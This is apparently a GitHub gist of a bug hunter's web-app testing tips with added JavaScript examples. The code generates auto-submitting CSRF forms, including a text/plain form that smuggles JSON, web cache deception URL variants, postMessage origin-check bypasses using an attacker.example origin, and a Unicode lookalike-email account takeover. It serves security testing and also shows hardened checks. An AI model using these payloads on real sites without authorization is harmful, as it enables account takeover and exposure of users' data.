
@abraidotti
Last active October 28, 2022 17:23
Rhynorater's Web app test tips

https://twitter.com/Rhynorater/status/1585640808568348674?s=20&t=Z5fB7J704bmtvT6kvV2c2w

  1. How is CSRF protection implemented? Does the application use only the application/json content-type? Can you convert {"name":"Justin"} to name=Justin and change the content-type? Is the CSRF token tied to the account? The session? Are there any "unauthed" CSRF tokens? Can you switch POST -> GET? If not, what are you getting? If 405, then it is parsing the route, but GET is disallowed at this endpoint. Try other endpoints.

  2. Is caching implemented? If so, is it tied to certain paths such as /assets? Can you path traverse - /assets/..;/test - does that cache? Can you find a place where an HTML content-type will be cached? Try the %3f.css or %23.css trick to see if you can trick the caching mechanism. Sometimes it's as simple as adding ?.png at the end of a URL. In such cases it is often very possible to get web cache deception.

  3. How is information passed between various parts of the system (different domains, etc.)? Does the system pass codes via query parameters? URL fragments? postMessage? Are there any pages where the X-Frame-Options header is mysteriously missing? Cross-domain interactions are almost always sketchy. Look deep into how each piece of these systems is implemented and try to wiggle your way in between the pieces.

  4. How do all the pieces of authentication work? Is the application using cookies? Auth tokens in the headers? Both? Where do these values appear? I often use the Burp plugin RequestMinimizer to help identify which pieces of the request are actually essential. Are there any half-authenticated states? 2FA-not-verified states? States before your email/phone is verified? Is authentication ever based solely off of text (such as an email in a JWT vs an ID)? If so, are there Unicode normalization attacks here?

  5. Is there any documentation for this application? I have legit never regretted reading the documentation for an application. I ALWAYS get something valuable out of it. It takes at MAX 1 hour (most of the time) and you walk away with a much better understanding of the app.

So much of web application hacking is about finding funky states you can get the application into. Reading the documentation will help you understand which parts of the application you (and thus other hackers) have not seen yet, and how to get to them. Priceless. That's it for now! If y'all got any 🔥 things you do each time you look at an app to help you understand how it functions, hmu here. Let's share that knowledge and keep pwning stuff.
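A worked version of the content-type switch in tip 1, added here as an example; it is not part of Rhynorater's thread. Given the JSON body an endpoint expects, it produces the form-encoded body, the POST -> GET variant, an auto-submitting form that sends the same fields as application/x-www-form-urlencoded, and, going one step beyond the tip, an enctype="text/plain" form whose wire body is itself valid JSON, for servers that parse JSON no matter what Content-Type says. The target URL and body are constructed.

```javascript
// Added example, not from Rhynorater's thread: turn a JSON API request into
// the cross-origin forms you would host to answer the CSRF questions in tip 1.
// The target URL and body below are constructed for illustration.

function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Flatten a JSON object into name/value pairs a form can carry. Nested
// values are re-serialised as JSON strings; whether the server's form
// parser accepts that is exactly what the test response tells you.
function jsonToFormFields(obj) {
  return Object.entries(obj).map(([k, v]) => [
    k,
    v !== null && typeof v === "object" ? JSON.stringify(v) : String(v),
  ]);
}

// application/x-www-form-urlencoded body: {"name":"Justin"} -> name=Justin
function jsonToFormBody(obj) {
  return jsonToFormFields(obj)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
}

// POST -> GET: the same parameters moved into the query string.
function toGetUrl(url, obj) {
  const sep = url.includes("?") ? "&" : "?";
  return url + sep + jsonToFormBody(obj);
}

function autoSubmit(formOpen, inputs) {
  return [formOpen, ...inputs, "</form>",
    "<script>document.forms[0].submit()</script>"].join("\n");
}

// Classic form PoC: the browser sends the flattened fields as
// application/x-www-form-urlencoded, i.e. the content-type switch from the tip.
function buildFormPoc(url, obj) {
  const inputs = jsonToFormFields(obj).map(
    ([k, v]) => `  <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`
  );
  return autoSubmit(`<form method="POST" action="${escapeAttr(url)}">`, inputs);
}

// If the server parses the body as JSON regardless of Content-Type, a
// text/plain form can send a body that is itself valid JSON. The browser
// emits name=value, so the '=' is hidden inside a throwaway key.
function textPlainParts(obj) {
  const json = JSON.stringify(obj);                          // {"name":"Justin"}
  const prefix = json === "{}" ? "{" : json.slice(0, -1) + ",";
  return { name: prefix + '"ignore":"', value: '"}' };       // {"name":"Justin","ignore":"  +  "}
}

function buildTextPlainPoc(url, obj) {
  const { name, value } = textPlainParts(obj);
  const input = `  <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`;
  return autoSubmit(
    `<form method="POST" enctype="text/plain" action="${escapeAttr(url)}">`, [input]);
}

// What the browser actually puts on the wire for the text/plain form
// (name, '=', value, CRLF); check it parses before hosting the PoC.
function textPlainBody(obj) {
  const { name, value } = textPlainParts(obj);
  return name + "=" + value + "\r\n";
}

const TARGET = "https://target.example/api/profile"; // constructed
const BODY = { name: "Justin" };                     // constructed
console.log(jsonToFormBody(BODY));
console.log(toGetUrl(TARGET, BODY));
console.log(buildFormPoc(TARGET, BODY));
console.log(buildTextPlainPoc(TARGET, BODY));
console.log(JSON.parse(textPlainBody(BODY)));
```

Host the generated HTML on an origin you control and watch whether the endpoint performs the action; a 415 on the form-encoded variant means the content-type is enforced, while a 405 on the GET variant means the route exists but the verb is refused, which is the distinction tip 1 draws.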
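Added example for tip 2, not from the thread: it builds the URL variants the tip names (%3f.css, %23.css, ?.png and the /assets/..;/ prefix traversal) for an authenticated page, and classifies responses using the headers common CDNs and proxies add (X-Cache, CF-Cache-Status, X-Cache-Status, Age). The host, paths and header sets are constructed; the prime-then-refetch pairing is the usual way to tell a cache hit from the origin answering twice.

```javascript
// Added example, not from Rhynorater's thread: URL variants for web cache
// deception testing plus a header-based "did a cache serve this?" check.
// Host, paths and sample headers are constructed for illustration.

// Variants that try to make the cache key look static while the origin
// still routes the request to the dynamic page.
function cacheDeceptionVariants(url, cachedPrefix = "/assets") {
  const u = new URL(url);
  const path = u.pathname;
  return {
    encodedQuestion: `${u.origin}${path}%3f.css`,   // origin may decode %3f to '?'
    encodedHash:     `${u.origin}${path}%23.css`,   // ...or %23 to '#'
    queryExtension:  `${u.origin}${path}?.png`,     // cache keys on the ".png"
    prefixTraversal: `${u.origin}${cachedPrefix}/..;/${path.replace(/^\//, "")}`, // ..; traversal out of the cached prefix
  };
}

function normalizeHeaders(h) {
  return Object.fromEntries(
    Object.entries(h).map(([k, v]) => [k.toLowerCase(), String(v)])
  );
}

// "hit", "miss" or "unknown" from the cache status headers, falling back to Age.
function classifyCacheHeaders(h) {
  const headers = normalizeHeaders(h);
  for (const name of ["x-cache", "cf-cache-status", "x-cache-status"]) {
    const v = headers[name];
    if (v === undefined) continue;
    if (/\bhit\b/i.test(v)) return "hit";
    if (/\b(miss|dynamic|bypass|expired)\b/i.test(v)) return "miss";
  }
  if (headers.age !== undefined && parseInt(headers.age, 10) > 0) return "hit";
  return "unknown";
}

// Web cache deception needs the *dynamic* response to be cached: HTML or
// JSON coming back from the cache, not a static asset.
function isCachedDynamicResponse(h) {
  const headers = normalizeHeaders(h);
  const ct = (headers["content-type"] || "").toLowerCase();
  const dynamic = ct.startsWith("text/html") || ct.startsWith("application/json");
  return dynamic && classifyCacheHeaders(headers) === "hit";
}

// Two requests per variant: the first primes, the second should come from
// cache. Returns the variant names whose second response looks cached.
function findDeceptionCandidates(responsesByVariant) {
  return Object.entries(responsesByVariant)
    .filter(([, [first, second]]) =>
      classifyCacheHeaders(first) !== "hit" && isCachedDynamicResponse(second))
    .map(([name]) => name);
}

// Constructed sample: the "?.png" variant was a MISS, then a HIT with HTML,
// while the %3f.css variant stayed DYNAMIC (never cached).
const SAMPLE_RESPONSES = {
  queryExtension: [
    { "Content-Type": "text/html; charset=utf-8", "X-Cache": "Miss from cloudfront", "Set-Cookie": "session=abc123" },
    { "Content-Type": "text/html; charset=utf-8", "X-Cache": "Hit from cloudfront", "Age": "12" },
  ],
  encodedQuestion: [
    { "Content-Type": "text/html", "CF-Cache-Status": "DYNAMIC" },
    { "Content-Type": "text/html", "CF-Cache-Status": "DYNAMIC" },
  ],
};

console.log(cacheDeceptionVariants("https://target.example/account/settings"));
console.log(findDeceptionCandidates(SAMPLE_RESPONSES));
```

Fetch each variant twice while logged in, then once from a fresh, unauthenticated session: a hit on that third request that still contains your account page is the deception. A response that the origin marked Cache-Control: private or Set-Cookie but that still comes back as a hit is the strongest signal that the cache keys on the extension rather than on what the origin said.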
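Added example for tip 3, not from the thread: the origin checks you meet in postMessage receivers, from none at all to an exact match, written over an event-like {origin, data} object so they run in Node without a browser, plus the sender-side rule that a credential never goes to targetOrigin "*". The trusted and attacker origins are constructed.

```javascript
// Added example, not from Rhynorater's thread: how postMessage receivers
// check event.origin, and which checks an attacker-registered host slips
// past. Origins are constructed for illustration.
const TRUSTED_ORIGIN = "https://app.target.example";

// Weakest to strongest. The first four each accept an origin the attacker
// can own: that is the gap to "wiggle in between".
const originChecks = {
  none:            (event) => true,
  substring:       (event) => event.origin.indexOf("target.example") !== -1,
  startsWith:      (event) => event.origin.startsWith(TRUSTED_ORIGIN),
  regexUnanchored: (event) => /https:\/\/app\.target\.example/.test(event.origin),
  exact:           (event) => event.origin === TRUSTED_ORIGIN,
};

// A receiver that lifts an auth code out of the message; returns the code
// it accepted or null. A real handler would go on to exchange it for a session.
function makeCodeReceiver(check) {
  return function onMessage(event) {
    if (!check(event)) return null;
    if (!event.data || typeof event.data.code !== "string") return null;
    return event.data.code;
  };
}

// Which checks does a given attacker-controlled origin get past?
function bypassReport(attackerOrigin) {
  const event = { origin: attackerOrigin, data: { code: "attacker-chosen" } };
  return Object.fromEntries(
    Object.entries(originChecks).map(
      ([name, check]) => [name, makeCodeReceiver(check)(event) !== null]
    )
  );
}

// Sender side: a code must go to an explicit targetOrigin, never "*",
// otherwise whatever page currently sits in the opener or frame receives it.
function sendCode(targetWindow, code, targetOrigin) {
  if (targetOrigin === "*") {
    throw new Error("refusing to postMessage a credential to '*'");
  }
  targetWindow.postMessage({ code }, targetOrigin);
}

// An attacker registers app.target.example.attacker.example: substring,
// prefix and unanchored-regex checks all accept it.
console.log(bypassReport("https://app.target.example.attacker.example"));
console.log(bypassReport("https://attacker.example"));
```

In the browser the receiver is `window.addEventListener("message", makeCodeReceiver(originChecks.exact))`; the same test values apply to the opener side, where `event.source` should additionally be compared against the window you opened.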
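Added example for the last question in tip 4, not from the thread: an account store that decides identity from the email text carried in a JWT (assumed already signature-verified, so only the claims object appears), beside the same store keyed on an opaque `sub` ID. Accounts and the lookalike address are constructed; the lookalike uses fullwidth k (U+FF4B), which NFKC normalization folds to ASCII k.

```javascript
// Added example, not from Rhynorater's thread: identity decided by the
// email string in a JWT vs by an ID, under Unicode normalization.
// Accounts, claims and addresses are constructed; JWT signature checking
// is assumed to have happened before `claims` reaches this code.

// Many stacks NFKC-normalize and case-fold emails somewhere (lookup,
// dedup, outbound mail), so two distinct strings can name one mailbox.
function canonicalEmail(email) {
  return email.normalize("NFKC").toLowerCase();
}

// Vulnerable flow: registration compares raw strings, so a lookalike
// address gets its own account; resolving a JWT by its email claim then
// uses the canonical form and finds the victim's account first.
class RawEmailAccounts {
  constructor() { this.accounts = []; this.nextId = 1; }
  register(email) {
    if (this.accounts.some((a) => a.email === email)) throw new Error("exists");
    const account = { id: this.nextId++, email };
    this.accounts.push(account);
    return account;
  }
  resolveClaims(claims) {
    const wanted = canonicalEmail(claims.email);
    return this.accounts.find((a) => canonicalEmail(a.email) === wanted) || null;
  }
}

// Hardened flow: collisions are rejected at registration using the same
// canonical form, and the JWT is resolved by the opaque `sub` ID, so the
// email text never decides who you are.
class IdKeyedAccounts extends RawEmailAccounts {
  register(email) {
    const wanted = canonicalEmail(email);
    if (this.accounts.some((a) => canonicalEmail(a.email) === wanted)) {
      throw new Error("exists (canonical collision)");
    }
    return super.register(email);
  }
  resolveClaims(claims) {
    return this.accounts.find((a) => a.id === claims.sub) || null;
  }
}

const VICTIM = "kim@target.example";            // constructed
const LOOKALIKE = "\uFF4Bim@target.example";    // fullwidth 'k', NFKC -> 'k'

// Register the victim, then try to register the lookalike and log in with
// a JWT that carries the lookalike email and the attacker's own sub.
function demo(StoreClass) {
  const store = new StoreClass();
  const victim = store.register(VICTIM);
  let attacker;
  try {
    attacker = store.register(LOOKALIKE);
  } catch (e) {
    return { registered: false, resolvedTo: null, victimId: victim.id };
  }
  const resolved = store.resolveClaims({ sub: attacker.id, email: LOOKALIKE });
  return { registered: true, resolvedTo: resolved ? resolved.id : null, victimId: victim.id };
}

console.log(canonicalEmail(LOOKALIKE) === VICTIM);
console.log("raw-email store:", demo(RawEmailAccounts));  // resolves to the victim's id
console.log("id-keyed store:", demo(IdKeyedAccounts));    // lookalike registration rejected
```

When testing a target, the question is which of these two shapes each authentication path has: anywhere an email, username or phone string from a token or a reset link is compared to stored data, try a compatibility-equivalent string (fullwidth forms, ligatures, Kelvin sign) and see whether registration, lookup and delivery all agree on what it means.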
